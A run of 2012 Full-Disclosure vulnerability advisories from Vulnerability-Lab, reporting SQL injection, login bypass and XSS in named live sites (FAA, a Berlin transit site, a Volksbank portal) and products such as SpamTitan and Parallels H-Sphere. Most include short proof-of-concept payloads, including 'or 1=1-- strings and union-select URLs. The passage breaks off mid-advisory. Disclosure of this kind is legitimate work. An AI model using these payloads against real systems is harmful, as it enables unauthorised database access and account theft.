Title: == FAA US Academy (AFS) - Auth Bypass Vulnerability Date: = 2012-01-28 References: === http://vulnerability-lab.com/get_content.php?id=171 VL-ID: = 171 Introduction: = This is a FAA computer system. FAA computer systems are provided for the processing of Official U.S. Government information only. All data contained on FAA computer systems is owned by the FAA may be monitored, intercepted, recorded, read, copied, or captured in any manner and disclosed in any manner, by authorized personnel. THERE IS NO RIGHT OF PRIVACY IN THIS SYSTEM. System personnel may give to law enforcement officials any potential evidence of crime found on FAA computer systems. USE OF THIS SYSTEM BY ANY USER, AUTHORIZED OR UNAUTHORIZED, CONSTITUTES CONSENT TO THIS MONITORING, INTERCEPTION, RECORDING, READING, COPYING, OR CAPTURING and DISCLOSURE. (Copy of the Vendor Homepage: http://www.faa.gov/afs650/) Abstract: = An anonymous Vulnerability-Laboratory researcher/analyst discovered an Auth Bypass vulnerability on the AFS application of the Federal Aviation Administration [Academy]. Report-Timeline: 2011-02-07: Vendor Notification 1 2011-03-23: Vendor Notification 2 2011-07-19: Vendor Notification 3 2011-**-**: Vendor Response/Feedback 2011-**-**: Vendor Fix/Patch 2012-01-28: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Critical Details: An auth bypass vulnerability is detected in the FAA AFS Evaluation Application System. The bug is located in a vulnerable login form which allows an remote attacker to bypass the application unauthorized. Successful exploitation can result in dbms academy website compromise via injection. Vulnerable Module(s): [+] Login - All Forms Affected Version(s): FAA AFS-300 Aircraft Maintenance Division FAA AFS-630 Customer Satisfaction Survey FAA AFS-640 Course Evaluation FAA AFS-650 Evaluation System --- AFS-630, AFS-640 AFS-650 Proof of Concept: = The auth bypass vulnerability can be exploited by remote attackers. For demonstration ... Username: 'or 1=1-- Password: 'or 1=1-- Reference(s): http://www.xxx.faa.gov/afs650/admin/ http://www.xxx.faa.gov/afs640/admin/ http://www.xxx.faa.gov/afs630/admin/ Note: Remember it's forbidden (law) to access or attack the FAA Computer System! We just analysed a submission! Risk: = The security risk of the auth bypass vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
Title: == Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities Date: = 2012-01-27 References: === http://vulnerability-lab.com/get_content.php?id=144 VL-ID: = 144 Introduction: = The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading network performance. Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including: * Firewall, VPN, and Traffic Shaping * Intrusion Prevention System (IPS) * Antivirus/Antispyware/Antimalware * Web Filtering * Antispam * Application Control (e.g., IM and P2P) * VoIP Support (H.323. and SCCP) * Layer 2/3 routing * Multiple WAN interface options FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) capabilities to separate various networks requiring different security policies. (Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate/ http://www.avfirewalls.com/) Abstract: = 1.1 Vulnerability-Lab Team discovered multiple persistent Web Vulnerabilities on the FortiGate UTM Appliance Application. 1.2 Vulnerability-Lab Team discovered multiple non-persistent Web Vulnerabilities on the FortiGate UTM Appliance Application. Report-Timeline: 2012-01-27: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = High Details: 1.1 Multiple input validation vulnerabilities(persistent) are detected on FortGate UTM Appliance Series. Remote attacker can include (persistent) malicious script code to manipulate specific customer/admin requests. The vulnerability allows an local low privileged attacker to manipulate the appliance(application) via persistent script code inject. It is also possible to hijack customer sessions via persistent script code execution on application side. Successful exploitation can also result in content/module request manipulation, execution of persistent malicious script code, session hijacking, account steal phishing. Vulnerable Module(s): (Persistent) [+] Endpoint = Monitor = Endpoint Monitor [+] Dailup List [+] LogReport = Display Picture(s): ../ive2.png ../ive3.png 1.2 Multiple input validation vulnerabilities(non-persistent) are detected on FortGate UTM Appliance Series. The vulnerability allows remote attackers to hijack admin/customer sessions with required user inter action (client-side). Successful exploitation allows to phish user accounts, redirect over client side requests or manipulate website context on client-side browser requests. Vulnerable Module(s): (Non-Persistent) [+] Endpoint - NAC - Application Database - Listings [+] List field sorted Picture(s): ../ive1.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers with or without user inter action. For demonstration or reproduce ... poc: = http://www.vulnerability-lab.com/get_content.php?id=144 Solution: = 1.1 To fix/patch the persistent input validation vulnerabilities restrict the input fields parse the input. Locate the vulnerable area(s) reproduce the bugs parse the output after a malicious(test) insert. Setup a filter or restriction mask to prevent against future persistent input validation attacks. 1.2 To fix the client side input validation vulnerability parse the vulnerable request by filtering the input cleanup the output. Set a input restriction or configure whitelist/filter to stop client side requests and form a secure exception-handling around. Risk: = 1.1 The security risk of the persistent vulnerabilities are estimated as high because of multiple persistent
[Full-disclosure] Verkehrsbetriebe Berlin - SQL Injection Vulnerability
Title: == Verkehrsbetriebe Berlin - SQL Injection Vulnerability Date: = 2012-01-25 References: === http://www.vulnerability-lab.com/get_content.php?id=138 VL-ID: = 138 Introduction: = VBB Verkehrsverbund Berlin-Brandenburg GmbH Der VBB koordiniert die Interessen der verschiedenen Partner und gestaltet die Entwicklung eines leistungsstarken integrierten Nahverkehrssystems in Berlin. (Copy of the Vendors Homepage: http://www.vbbonline.de/) Abstract: = An anonymous researcher discovered a critical SQL Injection Vulnerability on Berlins VBB Verkehrsbetriebe. Report-Timeline: 2011-02-09: Vendor Notification 1 2011-03-06: Vendor Notification 2 2011-04-13: Vendor Notification 3 2012-01-25: Vendor Response/Feedback 2012-01-25: Vendor Fix/Patch 2012-01-25: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Critical Details: A critical SQL Injection Vulnerability is detected on VBBs Verkehrsverbund Berlin-Brandenburg GmbH Website. The vulnerability allows remote attackers to inject own sql statements on the affected application/dbms. The successfull exploitation can result in website defacements, data lost, manipulation of content module destruction. Vulnerable Modules: [+] Language ID Pictures: ../sql1.png ../sql2.png Proof of Concept: = The vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ... File: index.php Para: ?cat=2sCat=392id_language= References: http://www.vbbonline.de/index.php?cat=2sCat=392id_language=-1 union select 1,2,3,4,5,version()/* http://www.vbbonline.de/index.php?cat=2sCat=392id_language=-1%20union%20select%201,2,3,4,5,database%28%29/* Reference(s): http://www.vbbonline.de/intern/static/index.php Risk: = The security risk of the sql injection vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Benjamin Kunz MejriPim J.F.P. Campers Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Acolyte CMS v1.5 and v6.3 - SQL Injection Vulnerabilities
Title: == Acolyte CMS v1.5 and v6.3 - SQL Injection Vulnerabilities Date: = 2012-01-25 References: === http://www.vulnerability-lab.com/get_content.php?id=397 VL-ID: = 397 Abstract: = A Vulnerability Laboratory researcher discovered a critical (remote) SQL Injection and a persistent XSS on the Acolyte CMS v1.5.3 and v1.6.3. Report-Timeline: 2012-01-25: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 A SQL Injection vulnerability is detected on the powered by Acolyte v1.5 v6.3 CMS. The vulnerability allows an remote attacker to execute sql commands via remote sql injection attack. The bug is located on the news_comments plugin_forum module of the content management system. Successful exploitation of the vulnerability allows remote attacker to compromise the application dbms. Vulnerable Module(s): (v1.5.3) [+] ?c=pluginplugin=forums [+] ?c=news_comments Vulnerable Module(s): (v1.6.3) [+] ?c=news_comments [+] ?c=forum_post 1.2 A persistent input validation vulnerability is detected on the powered by Acolyte v1.5 v6.3 CMS. The vulnerability allows an remote attacker to hijack customer sessions via application side attack. Successful exploitation with required user inter action allows an attacker to manipulate the web context requests of the vulnerable application module. Vulnerable Module(s): (v1.6.3 v1.5.3) [+] ?c=pluginplugin=forums Proof of Concept: = The vulnerabilities can be exploited by remote attacker. For demonstration or reproduce ... 1.1 v1.5.3 ?c=pluginplugin=forums2=topicss=[vuln] ?c=pluginplugin=forums2=posts=3t=[vuln] ?c=news_commentscid=[vuln] v1.6.3 ?c=forum_posts=3t=[vuln] ?c=forum_posts=[vuln] ?c=news_commentscid=[vuln] 1.2 ?c=pluginplugin=forums2=search scriptalert(vulnerability-lab)/script Risk: = 1.1 The security risk of the sql injection vulnerabilities are estimated as high(+). 1.2 The security risk of the persistent input validation vulnerability is estimated as medium(+). Credits: Vulnerability Laboratory Researcher - snup (snup@gmail.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SpamTitan Application v5.08x - SQL Injection Vulnerability
Title: == SpamTitan Application v5.08x - SQL Injection Vulnerability Date: = 2012-01-23 References: === http://www.vulnerability-lab.com/get_content.php?id=197 VL-ID: = 197 Introduction: = SpamTitan Anti Spam is a complete software solution to email security offering protection from Spam, Viruses, Trojans, Phishing and unwanted content. Feature Set * Two Anti Virus engines including ClamAV and Kaspersky Labs * Multi layered Anti Spam analyses resulting in 98% plus Spam detection * Less than 0.03% False Positive Rate * Content Filtering * Inward and outward email scanning * Email Disclaimer capability * Simple download and installation process * Plug and Play Solution * End user Spam management using email quarantine reports * Web based administrative GUI * Multiple automated reports * Automated updating including anti virus, anti spam, version releases and system backup * LDAP, Dynamic and aliases file recipient verification * Per domain administrators * Per domain reports * API * Multi node Cluster SpamTitan is available in two flavours, SpamTitan ISO and SpamTitan for VMware®, both of which can be downloaded and installed for free. (Copy of the Vendor Homepage: http://www.spamtitan.com/products) Abstract: = Vulnerability Lab Team discovered a remote SQL Injection vulnerability on the SpamTitan Appliance(Application) v5.08.x Report-Timeline: 2011-09-17: Vendor Notification 2011-11-20: Vendor Response/Feedback 2011-01-14: Vendor Fix/Patch 2011-01-23: Public or Non-Public Disclosure Status: Published Affected Products: == Copperfasten Technologies Product: SpamTitan Appliance Application v5.0x Exploitation-Technique: === Remote Severity: = Critical Details: A remote sql injection vulnerability is detected on the new SpamTitan Application v5.08.x The vulnerability allows an remote attacker to inject execute own sql statements blind. The attack method is Order by Injection. --- Error Logs --- MDB2 Error: unknown error Vulnerable Module(s): [+] Session QID+RID Picture(s): ../sql1.png Proof of Concept: = The vulnerabilitys can be exploited by remote attackers. For demonstration or reproduce ... Path: ../ File: viewmail.php Param(s): ?activepage=detailsqid=w3jYVc7V3LFFrid= Section(SQL): http://[Server]:[Port]/[File]+[Param]+[Session][QID]=87' order by 15-- Reference(s): http://xxx.com:8080/viewmail.php?activepage=detailsqid=w3jYVc7V3LFFrid=87%27%20order%20by%2015-- Risk: = The security risk of the sql injection vulnerability are estimated as critical. Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri Pim J.F. Campers Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Zone Rouge CMS 2012 - SQL Injection Vulnerability
Title: == Zone Rouge CMS 2012 - SQL Injection Vulnerability Date: = 2012-01-21 References: === http://www.vulnerability-lab.com/get_content.php?id=391 VL-ID: = 391 Introduction: = Professional CMS with many amenities, popular in his country. (Copy of the Vendor Homepage: http://zonerouge.fr) Abstract: = A Vulnerability Laboratory researcher discovered a critical (remote) SQL Injection Vulnerability on Powered by Zone Rouge CMS. Report-Timeline: 2012-01-21: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = High Details: A remote SQL Injection Vulnerability has been discovered on the Powered by Zone Rouge CMS application. The vulnerability allows an attacker to execute own sql commands via injection. The bug is located on the following files driver.php, photos.php, release.php. Successful exploitation can result in cms dbms comprimise via remote sql injection. Vulnerable File(s): [+] driver.php [+] photos.php [+] release.php Proof of Concept: = The vulnerabilities can be exploited by remote attackers without user inter action. For demonstration or reproduce ... PoC: [+] driver.php?langue=frchamp=`[SQL-Injection] [+] photos.php?langue=frarchives=`[SQL-Injection] [+] release.php?langue=frchamp=`[SQL-Injection] Reference(s): [+] http://[SERVER].COM/[FILE].PHP?langue=frarchives=`%60 Risk: = The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: Vulnerability Laboratory Researcher - snup (snup@gmail.com) = Gr33tz: = = agilob, cOnd, czoik, drummachina, gocys, prick = im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom = antonius, Rem0ve longrifle0x Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla com_mobile Component - SQL Injection Vulnerability
Title: == Joomla com_mobile Component - SQL Injection Vulnerability Date: = 2012-01-21 References: === http://www.vulnerability-lab.com/get_content.php?id=393 VL-ID: = 393 Introduction: = com_mobile Joomla CMS Component Abstract: = A Vulnerability Laboratory Researcher discovered multiple SQL Injection Vulnerabilities on the Joomla com_mobile Component. Report-Timeline: 2012-01-22: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: Multiple SQL Injection vulnerabilities are detected on the Joomla com_mobile Component. The vulnerability allows remote attackers to inject own sql commands on the affected application dbms. Successful exploitation can result in dbms, website application compromise. Vulnerable Module(s): [+] ?option=com_mobileview=mobilelayout=songsdownloadid= [+] ?option=com_mobileformat=rawtask=rezomeidshop= Proof of Concept: = The vulnerabilities can be exploited by remote attackers without user inter action. For demonstration or reproduce ... PoC: http://localhost/index.php?option=com_mobileview=mobilelayout=songsdownloadid=[SQL-INJECTION!] http://localhost/index.php?option=com_mobileformat=rawtask=rezomeidshop=[SQL-INJECTION!] Reference(s): http://xxx.com/index.php?option=com_mobileview=mobilelayout=songsdownloadid=102' [SQL-INJECTION!] http://xxx.com/index.php?option=com_mobileformat=rawtask=rezomeidshop=160'[SQL-INJECTION!] Risk: = The security risk of the remote sql injection vulnerabilities are estimated as high(+). Credits: the_cyber_nuxbie [www.thecybernuxbie.com] (st...@thecybernuxbie.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Parallels H Sphere v3.3 P1 - Multiple Persistent Vulnerabilities
Title: == Parallels H Sphere v3.3 P1 - Multiple Persistent Vulnerabilities Date: = 2012-01-22 References: === http://www.vulnerability-lab.com/get_content.php?id=392 VL-ID: = 392 Introduction: = Parallels H-Sphere delivers a multi-server hosting automation solution for Linux, BSD, and Windows platforms. H-Sphere includes its own controls panels, automated billing, and provisioning solution in a single integrated system. It is scalable to any number of boxes — more Web, mail, database, and Windows hosting servers can be added without downtime. Abstract: = A Vulnerability Laboratory researcher discovered multiple persistant cross site scripting vulnerabilities on Parallels H-Sphere 3.3 Patch1. Report-Timeline: 2012-01-22: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistant cross site scripting vulnerabilities where detected on Parallels H-Sphere 3.3 Patch1. These vulnerabilities allow an remote attacker to hijack customer sessions via persistent cross site scripting. Successful exploitation can result in account steal, client side exploitation or phishing session hijacking. These bugs are located on the admin panel of Parallels H-Sphere 3.3 Patch1. Vulnerbale Module(s): [+] Group Module [+] Extra Package Module Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerability can be exploited by remote attackers with high account privileges(mod/admin) required user inter action. For demonstration or reproduce ... [Poc 1] Open Link: http://demo.psoft.net/psoft/servlet/psoft.hsphere.CP/admin/1_0/psoft.hsphere.CP?template_name=admin/group_plans.html choose admin post xss on Group Name: IFRAME SRC=javascript:alert('XSS');/IFRAME press add group. Result XSS! [Poc 2] Open link: http://demo.psoft.net/psoft/servlet/psoft.hsphere.CP/admin/1_0/psoft.hsphere.CP?template_name=admin/extra_packs/create_extra_pack.html Extra Pack Name put xss code: IFRAME SRC=javascript:alert('XSS');/IFRAME Extra Package Prices set fee 1 recurrent fee 1 just click submit you will see result. Risk: = The security risk of the persistant cross site scripting vulnerabilities are estimated as medium(-). Credits: Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Bart`s CMS - SQL Injection Vulnerability
Title: == Bart`s CMS - SQL Injection Vulnerability Date: = 2012-01-23 References: === http://www.vulnerability-lab.com/get_content.php?id=390 VL-ID: = 390 Introduction: = It is a website Content Management System that is build with Codecharge Studio. There will also be a commercial package, which contains all source code AND the Codecharge Studio project files. More information on Codecharge Studio can be found on the website of Yessoftware. Currently the CMS includes the following modules: Default / CMS Users Website pages Blocks Banners Links Image gallery Store / Webshop Diagrams Download manager IP To Country Mailing Polls Calendar / Events Blog / News Guestbook JW Flash Image Rotator (Copy of the Vendor Website: http://www.yessoftware.com/index2.php ) (Copy: http://trinityhome.org/Home/index.php?content=BART_S_CMS_WHAT_IS_ITfront_id=21lang=enlocale=en) Abstract: = A Vulnerability Laboratory researcher discovered a critical (remote) SQL Injection Vulnerability on Bart`s CMS. Report-Timeline: 2012-01-23: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A remote SQL Injection Vulnerability has been discovered on the Bart`s CMS application. The vulnerability allows an attacker to execute own sql commands via injection. The bug is located on the following files blog.php blog_comments.php. Successful exploitation can result in cms dbms comprimise via remote sql injection. Vulnerable Module(s): [+] blog.php [+] blog_comments.php Proof of Concept: = The vulnerability can be exploited by remote attacker without user inter action. For demonstration or reproduce ... PoC: [SERVER].COM/[BART CMS PATH]/blog_comments.php?blog_id=`[SQL-Injection] Risk: = The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: Vulnerability Laboratory Researcher - snup (snup@gmail.com) = Gr33tz: = = agilob, cOnd, czoik, drummachina, gocys, prick = im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom = antonius, Rem0ve, longrifle0x Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] VolksBank ZU Application - Auth Bypass Vulnerability
Title: == VolksBank ZU Application - Auth Bypass Vulnerability Date: = 2012-01-20 References: === http://www.vulnerability-lab.com/get_content.php?id=382 VL-ID: = 382 Introduction: = Die Volksbank AG trifft eine Reihe von Sicherheitsvorkehrungen, die einen wirksamen Schutz gegen Angriffe bei der Übertragung der Daten oder der Verarbeitung auf dem Bankenserver bieten. Treffen auch Sie Vorkehrungen zum Schutz vor unberechtigten Manipulationen oder Eingriffen von Dritten und melden Sie uns auffällige Mails. Geben Sie auf der folgenden Seite als Verfügernummer eine beliebige Zahl ein und klicken Sie anschließend auf LOGINum die Demo-Version zu starten. (Copy of the Vendor Homepage: https://www.banking.co.at/appl/ebp/login.html?resource=074demo=true) Abstract: = An anonymous Vulnerability Lab Researcher discovered an Auth Bypass Vulnerability on a famous Volksbank portal application. Report-Timeline: 2011-02-07: Vendor Notification 2011-00-00: Vendor Response/Feedback 2011-00-00: Vendor Fix/Patch 2012-01-20: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: An auth bypass vulnerability is detected on the login system of the Zinsuniversum of the volksbank website portal. The vulnerability allows an remote attacker to bypass the login form unauthorized via or 1=1 Successfull exploitation can result in application dbms compromise account/password steal. Vulnerable Module(s): [+] Login - Form --- Information Logs --- Rechtliche Hinweise Mit dem Zugriff auf die Informationen auf dieser Internetseite erklären Sie, dass Sie die rechtlichen Bedingungen im Zusammenhang mit dieser Seite verstanden haben und ausdrücklich anerkennen. Kein Anbot, reine Information Die auf dieser Internetseite veröffentlichten Daten und Angaben dienen ausschließlich der unverbindlichen Information. Keine der hierin enthaltenen Information begründet eine Empfehlung für den An- und Verkauf von Wertpapieren und Veranlagungen. Die Information ersetzt nicht die Beratung für die auf dieser Internetseite beschriebenen Produkte und dient insbesondere nicht als Ersatz für die umfassende Risikoaufklärung. Soweit auf dieser Internetseite für Produkte Bewertungen bzw. Kurse gestellt werden, handelt es sich in der Regel um indikative Bewertungskurse. Aus den indikativen Bewertungskursen kann nicht abgeleitet werden, dass Produkte zu diesen ge- bzw. verkauft werden können. Angaben zur Wertentwicklung eines Produktes in der Vergangenheit lassen keine verlässlichen Rückschlüsse auf die zukünftige Entwicklung eines Produktes zu. Keine Haftung Trotz aller Sorgfalt ist jede Haftung oder Garantie für die Aktualität, Richtigkeit und Vollständigkeit der auf dieser Internetseite zur Verfügung gestellten Informationen, Daten und Angaben ausgeschlossen. Die ÖVAG übernimmt keine Verantwortung und gibt keine Gewähr dafür ab, dass die Funktionen auf dieser Internetseite nicht unterbrochen werden oder fehlerlos sind. Keine Weitergabe. Eine Weitergabe der zur Verfügung gestellten Informationen an Dritte ist verboten. Proof of Concept: = The vulnerability can be exploited by remote attackers. For demonstration or reproduce ... String: 'or 1=1--... Insert as Username and Password Reference(s): http://www.volksbank.com/m101/volksbank/m074_4/de/individuelle_seite/zinsuniversum/zinsuni_login.jsp Solution: = Example ... $username = mysql_real_escape_string($_POST[ username ]); $password = mysql_real_escape_string($_POST[ password\\\]); $sql = \\ SELECT * FROM users WHERE username= . $username . \\ AND password= . $password . ``; $response = mysql_query($sql); Risk: = The security risk of the login bypass web vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - N/AAnonymous Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including
[Full-disclosure] Syneto UTM WAF v1.4.2 - Multiple Web Vulnerabilities
Title: == Syneto UTM WAF v1.4.2 - Multiple Web Vulnerabilities Date: = 2012-01-20 References: === http://www.vulnerability-lab.com/get_content.php?id=373 VL-ID: = 373 Introduction: = The Syneto UTM (Unified Threat Management) is a security appliance that performs multiple functions and delivers maximum protection against internet threats. It s a single device that has it all: firewall, gateway antivirus and anti-spam, VPN, content filter, multiple gateways and on-appliance reporting. Syneto UTM was specifically designed to easily be deployed and managed, supply top protection and save you money. (Copy of the Vendor Homepage: http://syneto.net/en/network-security/utm) Abstract: = A Vulnerability-Lab researcher discovered multiple web vulnerabilities on Synetos Security UTM Application v1.4.x v1.3.3 CE. Report-Timeline: 2011-10-07: Vendor Notification 2012-**-**: Vendor Response/Feedback 2012-**-**: Vendor Fix/Patch 2012-01-20: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 Multiple persistent web vulnerabilities are detected on the Syneto Unified Threat Management Security Appliance Application. The vulnerability allows an privileged user account to inject malicious persistent script code on application side(server). Successful exploitation of the vulnerability can result in account steal, persistent session hijacking via script code inject, persistent 